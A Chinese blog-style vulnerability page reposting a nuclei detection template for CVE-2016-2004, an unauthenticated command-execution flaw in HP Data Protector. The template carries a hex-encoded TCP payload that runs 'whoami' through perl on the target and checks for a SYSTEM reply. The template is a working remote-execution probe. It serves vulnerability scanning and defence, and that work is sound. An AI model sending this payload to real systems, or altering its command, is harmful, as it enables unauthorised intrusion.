HP Data Protector Arbitrary Command Execution Vulnerability

漏洞信息

漏洞名称: HP Data Protector Arbitrary Command Execution Vulnerability

漏洞编号:

  • CVE: CVE-2016-2004

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: HP Data Protector是一款企业级数据备份和恢复解决方案,广泛应用于各种规模的企业中,用于保护关键数据免受丢失或损坏。该产品因其强大的功能和可靠性而被许多组织所依赖。此次发现的漏洞允许攻击者通过未指定的向量执行任意代码,这是由于对CVE-2014-2623的不完全修复导致的。具体来说,漏洞的根源在于缺乏适当的认证机制,使得攻击者可以绕过安全措施,直接与Data Protector服务交互。这种漏洞的利用可能导致攻击者以Data Protector服务账户的权限执行任意命令,从而完全控制系统,访问敏感数据,甚至进一步渗透企业内部网络。由于这是一个远程代码执行漏洞,且不需要用户交互即可被利用,因此其危害性极高。企业应立即升级到最新版本的HP Data Protector以防范此漏洞。

产品厂商: HP

产品名称: Data Protector

影响版本: before 7.03_108, 8.x before 8.15, and 9.x before 9.06

来源: https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2016%2FCVE-2016-2004.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    epss-score: 0.92734
    epss-percentile: 0.99751
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: data_protector
  tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp

tcp:
  - host:
      - "{{Hostname}}"

    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex

    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 490a0046304402205cb8d4fc530d3448a6fd8ee810f0c3ebf70d1061fecfe0c5b61fcdb60c0f055c02200ddf9aa8fc1921d76c065889e43a4401a29dd6de877e348916bcf601ecfef8bc:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
HP Data Protector Arbitrary Command Execution Vulnerability
http://example.com/2025/07/08/github_884873307/
作者
lianccc
发布于
2025年7月8日
许可协议